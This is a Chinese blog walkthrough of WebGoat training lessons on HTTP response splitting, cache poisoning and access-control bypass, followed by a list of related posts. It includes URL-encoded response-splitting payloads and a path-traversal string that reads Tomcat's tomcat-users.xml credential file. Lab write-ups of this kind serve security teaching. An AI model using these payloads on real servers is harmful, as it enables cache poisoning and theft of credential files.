WebGoat--general+Access Control Flaws

最新推荐文章于 2022-09-02 09:54:43 发布
最新推荐文章于 2022-09-02 09:54:43 发布
阅读量379 收藏 1
点赞数 1
分类专栏: OWASP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1453514850/article/details/88327316
版权

WebGoat是基于WEB实验漏洞的Java靶场程序,跨站点脚本攻击(XSS),访问控制,线程安全,操作隐藏字段,操纵参数,弱会话cookie,SQL盲注,数字型SQL注入,字符串型SQL注入,web服务、Open Authentication失效,危险的HTML注释等

 

0xx1 General

  1. HTTP相应

主要是了解HTTP提交,输入框输入之后点击提交就行

  1. HTTP拆分
    1. 判断,重定向里边的Location参数恰好是提交的参数chinese,这样,就存在HTTP应答拆分的可能

    1. http://yehg.net/encoding/进行URL编码,将URL编码后提交

               China

              Content-Length: 0

               HTTP/1.1 200 OK

              Content-Type: application/x-www-form-urlencoded

              Content-Length: 47

              <html>Gogoing</html>

 

URL编码为:

China%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AContent-Length%3A%2047%0A%3Chtml%3EGogoing%3C%2Fhtml%3E%0A

 

如果某行的内容是Content-Length:0,则浏览器响应队列会认为这个响应已经结束.浏览器向重定向地址发送请求后会把Content-Length:0之后的内容当成下一个响应,从而显示<html>Gogoing</html>页面内容

 

  1. 在这个基础上可以改进攻击方式让它更有威胁.在构造的请求中加入Last-modify字段,并设置一个将来的值比如2020年1月1日.意思是服务器告诉浏览器,这个网页最后一次修改是在2020年1月1日.如果浏览器不清除缓存,下一次请求这个页面会加上if-modify-since字段,值是2020年1月1日,也就是说浏览器会问服务器,这个网页在2020年1月1日之后修改过嘛?当然服务器是人的话肯定会对这个问法莫名其妙,怎么会传过来一个未来的值?但是因为是程序,服务器会比对最后一次修改时间和传过来的时间,发现传过来的时间较新,就会回送304即Not Modified,表示这个网页没有被修改过.浏览器接受到了这个响应会从本地缓存读取网页,当然是之前注入的错误网页.如果浏览器不清除缓存,再也别想读取到正确的网页信息了.这就是HTTP的Cache Poisoning(缓存毒化)。

  2. china

    Content-Length: 0

    HTTP/1.1 200 OK

    Content-Type: application/x-www-form-urlencoded

    Last-Modified: Mon, 27 Oct 2222 14:50:18 GMT

    Content-Length: 47

     

    URL编码:

    china%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202222%2014%3A50%3A18%20GMT%0AContent-Length%3A%2047

     

    0xx2 Access Control Flaws(访问控制缺陷)

         1. Using an Access Control Matrix(使用访问控制矩阵)

             这个就比较简单了,找到对应权限就OK

         2. Bypass a Path Based Access Control Scheme(绕过基于路径的访问控制方案)

             我们需要找到对应的.xml文件来通关,由于启动方式的不同,文件路径也不一定相同

             首先,先确定一下当前路径和目标路径(经查证,我这里的目标路径给错了,应该是tomcat6/conf/tomcat-user.xml)

然后使用Burpsuite抓包,然后修改一下File部分,修改为: ../../../../../../../../../var/lib/tomcat6/conf/tomcat-users.xml(注意自己的路径,此处不唯一)

 

 

小英雄宋人头
关注
专栏目录
WebGoat第二关:Access Control Flaws
锐之锋芒
08-31 4252
闲来无事又把webgoat第二关打通了,第二关总体上来讲比较简单。 2-1 :Using an Access Control Matrix 没啥可说的,随便试试就通关了。 2-2 : Bypass a Path Based Access Control Scheme 根据提示尝试访问tomcat根目录下的conf目录里的tomcat-conf.xml,解法大体思路有两种,首先用webscar
WebGoat8 M17 Access Control Flaws 题解
伊维泽诺流浪记
03-12 528
2 用户名tom密码cat登录即可 3 f12看到一个叫profile的包,查看响应就发现了参数 对比一下,没显示出来的参数是role和userId,下一题 4 照经验来看,这种时候一般都是在后面跟数字数字或者用户名之类的,于是先试了一下上题里的userId: WebGoat/profile/2342384 结果连回显都没有,应该是服务器报错了。 再回去抓一下...
WebGoat学习笔记一---Access Control Flaws
real14
11-22 1107
l  Using anAccess Control Matrix 不同的用户访问权限不相同,题目要求我们找到能够访问AccountManager非管理员用户,那么我们只需要尝试user和resoure的组合就可以了,经过尝试,发现Larry用户的身份是 [User, Manager],却可以访问Account Manager l  Bypass a PathBased Access C
WebGoat学习——访问控制缺陷Access Control Flaws
weixin_33908217的博客
04-11 500
  在一个基于角色的访问控制方案中,角色代表了一组访问权限和特权。一个用户可以被分配一个或多个角色。一个基于角色的访问控制方案通常有两个部分组成:角色权限管理和角色分配。一个被破坏的基于角色的访问控制方案可能允许用户执行不允许他/她的被分配的角色,或以某种方式允许特权升级到未经授权的角色的访问。 1.绕过基于路径的访问控制方案   在一个基于路径的访问控制方案中,攻击者可以通过提供相对路径信...
WebGoat系列实验Access Control Flaws
weixin_30471065的博客
09-07 252
WebGoat系列实验Access Control Flaws Using an Access Control Matrix 在基于角色的访问控制策略中,每个角色都代表了一个访问权限的集合。一个用户可以分配一到多个角色。基于角色的访问控制策略通常由两部分组成:角色许可管理与角色分配。基于角色的访问控制策略受到破坏就可能允许用户进行访问本不属于他的角色,或者以某种方式提升未经授权角色的特权。 依次...
webgoat学习笔记——General
weixin_33698043的博客
02-10 381
Part one:Http Basics 这个部分需要用到WebScarab插件,此插件需要设置代理,HTTP代理:localhost,端口:8008,原先我是在win7系统上装的webgoat,这就需要在浏览器中设置代理,现在我在虚拟机中安装了owasp的系统,将webgoat以及所需的插件都集成在系统中了,用起来很方便,这个只需要启用代理服务器WebScarab...
Webgoat 笔记-Access Control Flaws
weixin_33862514的博客
10-02 133
Access Control Flaws (该文转载) 3.1 Using an Access Control Matrix 矩阵暴力破解 课程介绍:一个角色只能访问固定的资源,探索这个web页面的权限规则,只有admin权限的user可以访问'Account Manager' resource. 目标:用非admin 权限的user访问到 'Accou...
WebGoat General HTTP Basics
箭雨镜屋
02-18 899
今天上班第一天orz来个简单的 General的HTTP Basics这关用burpsuite很简单的,但本着每天学点新东西(就算是很简单,但是没用过)的精神,这关我打算用chrome的开发者工具来过。 有三种方式可以打开chrome的开发者工具: (1)快捷键(windows是ctrl+shift+I,macos是option+command+I) (2)右键--检查 (3)右上角菜单--更多工具--开发者工具 第2页 这关按照提示随便输入点什么,按Go!就可以过了 第3页 主要就是
WebGoat General Crypto Basics
箭雨镜屋
02-21 3265
第2页 这一页是讲base64编码和Basic Authentication的 简单来说Basic Authentication中使用了base64编码,以本页的题目举例,如果有个HTTP头长这样 Authorization: Basic ZmFuY3llbGU6c2VjcmV0 那这个网站就是用了Basic Authentication,并且ZmFuY3llbGU6c2VjcmV0就是base64编码的用户名和密码,格式是 用户名:密码 网上随便找个base64解码器解码,或者用.
WebGoat笔记三_访问控制缺陷(AccessControlFlaws).pdf
10-05
WebGoat笔记三_访问控制缺陷(AccessControlFlaws).pdf
Webgoat学习笔记.zip
03-12
Webgoat学习笔记
Goat V2.35.rar
01-05
远控、屏幕监控、主机管理、远程命令 还算比较好用的 远控,服务生成客户端。 没有做免杀! 自己做,自己做~!
Webgoat渗透环境-General
qq_43681802的博客
02-03 653
# OWASP靶机–webgoat环境(General练习) 提示:本文记录学习webgoat渗透环境过程,首先要下载OWASP系统,参考前面的文章进行下载和安装。在浏览器中访问OWASP的ip地址进行访问 文章目录# OWASP靶机--webgoat环境(General练习)前言一、HTTP基础知识二、HTTP练习1.HTTP响应2.HTTP拆分什么是HTTP拆分?HTTP拆分过程总结 前言 WebGoat是OWASP组织研制出的用于进行web漏洞实验的Java靶场程序,用来说明web应用中存在的安全
WebGoat系列のAccess Control Flaws(访问控制缺陷)
weixin_33969116的博客
02-26 195
Using an Access Control Matrix 用户权限:     Moe--> public share     Larry-->Time Card Entry,Performance Review,Time Card Approval,Account Manager     Curly--> public share,Performance Revie...
【详解】webgoat Web渗透测试平台General单元 攻略
M0nH1N的博客
08-07 1485
一、什么是webgoatWebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。WebGoat提供了一系列web安全学习的教程,某些课程也给出了
linux部署webgoat
zhangxm_qz的博客
09-02 629
将包上传到服务器上,需要说明该包依赖java环境且对java版本要求较高,我们这里是用java17进行部署,需要提前配置好java17。访问 http://10.xx.xx.xx:8080/WebGoat/ 进入注册登录页面。执行java -version 看到java版本信息 标识java环境配置成功。完成注册 并登录 进入功能页面如下,如此就可以开启闯关之旅了。下载webgoat-server-8.2.2 .jar。github上下载程序包,如果太慢可以。java部署过程参见。
WebGoat8 M17 General 攻略答案
伊维泽诺流浪记
03-11 1170
General HTTP Basics 2 随便输名字就行 3 用Firefox或者Chrome,F12查看方法和表单参数的magic_num 方法是POST,magic_number是随机的 HTTP Proxies 6 抓Submit的包,按他的要求改 ...
手把手教你在kali-Linux 2020.3安装webgoat
M0nH1N的博客
07-29 3409
文章目录 前言 一、webgoat是什么? 二、安装过程 1.下载webgoat 2.直接拖入kali并创建一个webgoat的文件夹 3.检测Java环境~ 4.在终端打开webgoat-server-8.0.0.M26.jar的文件夹 5.输入代码运行~ 6.waiting~ 7.启动成功 8.浏览器直接访问 9.注册登入即可访问 三、可能存在的问题 总结 前言 随着社会的发展,网络安全意识已深入人心。对于初入安全行业的小白来说,需要一个集学习、练习于一体的平台,...
WebGoat——绕过基于路径的访问控制方案
lay_loge的博客
03-18 780
题目: The ‘guest’ user has access to all the files in the lesson_plans directory. Try to break the access control mechanism and access a resource that is not in the listed directory. After selecting a f...
Error: Unable to access jarfile webgoat-server-8.2.2.jar
最新发布
09-10
这个错误提示表明您尝试执行的命令无法找到名为`webgoat-server-8.2.2.jar`的JAR文件。这通常是因为以下几种情况之一: 1. 您可能没有将JAR文件放在当前的工作目录中,因此命令行无法找到它。 2. 文件名可能存在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值